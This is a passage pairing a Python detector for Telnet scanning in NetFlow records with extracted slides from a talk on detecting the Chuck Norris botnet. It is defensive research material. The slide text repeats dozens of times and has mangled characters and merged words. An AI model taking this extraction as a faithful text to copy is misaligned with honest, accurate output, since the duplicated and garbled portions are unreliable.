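    flags: str      # nfdump-style UAPRSF string, e.g. "....S." for a bare SYN
    packets: int
    octets: int


@dataclass
class ScanAlert:
    src: str
    targets: int           # distinct destination hosts probed on TCP/23
    flows: int             # TCP/23 flows seen from this source
    syn_only_ratio: float  # share of those flows that never got past SYN


def parse_flow(line):
    """Parse one flow line into a Flow; return None for lines that do not match."""
    m = FLOW_RE.match(line.strip())
    if not m:
        return None
    return Flow(m["ts"], m["proto"], m["src"], int(m["sport"]), m["dst"],
                int(m["dport"]), m["flags"], int(m["pkts"]), int(m["octets"]))


def detect_telnet_scanners(flows, min_targets=20, min_syn_ratio=0.8):
    """Report sources that touched at least min_targets distinct hosts on TCP/23
    and whose TCP/23 flows are mostly unanswered probes (<=2 packets, no ACK).
    Both thresholds are assumptions chosen for this example."""
    per_src = defaultdict(list)
    for f in flows:
        if f.proto == "TCP" and f.dport == 23:
            per_src[f.src].append(f)
    alerts = []
    for src, fl in per_src.items():
        targets = {f.dst for f in fl}
        if len(targets) < min_targets:
            continue  # a few Telnet sessions to a few hosts is normal admin work
        syn_only = sum(1 for f in fl if f.packets <= 2 and "A" not in f.flags)
        ratio = syn_only / len(fl)
        if ratio >= min_syn_ratio:
            alerts.append(ScanAlert(src, len(targets), len(fl), ratio))
    return sorted(alerts, key=lambda a: a.targets, reverse=True)


def build_sample_lines():
    """Constructed flows: one scanning bot, one admin with real Telnet sessions,
    one busy web client (all addresses taken from documentation ranges)."""
    lines = []
    for i in range(1, 41):   # bot: bare SYNs to 40 different hosts on port 23
        lines.append(f"2011-01-12 10:00:{i:02d}.000 TCP 10.0.5.7:{41000 + i} "
                     f"-> 192.0.2.{i}:23 ....S. 1 60")
    for i in range(1, 4):    # admin: three completed Telnet sessions
        lines.append(f"2011-01-12 10:01:0{i}.000 TCP 10.0.5.8:{50000 + i} "
                     f"-> 198.51.100.{i}:23 .AP.SF 48 3100")
    for i in range(1, 31):   # web client: many flows, but to port 80
        lines.append(f"2011-01-12 10:02:{i:02d}.000 TCP 10.0.5.9:{52000 + i} "
                     f"-> 203.0.113.{i}:80 .AP.SF 12 900")
    return lines


def run_detection(lines=None):
    """Parse the lines (sample data when none are given) and run the detector."""
    if lines is None:
        lines = build_sample_lines()
    flows = [f for f in map(parse_flow, lines) if f is not None]
    return detect_telnet_scanners(flows)


def format_alert(alert):
    """One-line report in the style the plugin emits to web, e-mail and syslog."""
    return (f"cndet: telnet scan from {alert.src}: {alert.targets} targets, "
            f"{alert.flows} flows, {alert.syn_only_ratio:.0%} SYN-only")


if __name__ == "__main__":
    for alert in run_detection():
        print(format_alert(alert))
```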
Web Interface – Infected Host Detected
Part V
Conclusion
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible bots
infection of a vulnerable device
bot initialization/update
botnet operation
Botnet Detection Plugin Customization
modular plugin engine
easy modification for detection of other botnets
we need to customize detection methods
plugin distributed under the BSD license
Conclusion
Network Devices Are Not Protected
Routers, access points, printers, cameras, TVs
No AV software, missing patches and firmware updates
But they should be protected
Experience
NetFlow can monitor all such devices in the network
Discovery of the new Chuck Norris botnet using NetFlow
Developed a specialized NfSen plugin for Chuck Norris botnet detection
Future
Chuck Norris is down but others are coming (e.g. Stuxnet)
We are open to research collaboration
Detection plugin is available at our project site
Thank You For Your Attention
Vojtěch Krmíček, Tomáš Plesník
{vojtec|plesnik}@ics.muni.cz
Project CYBER: http://www.muni.cz/ics/cyber
Detecting Botnets with NetFlow
This material is based upon work supported by the Czech Ministry of Defence under Contract No. OVMASUN200801
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
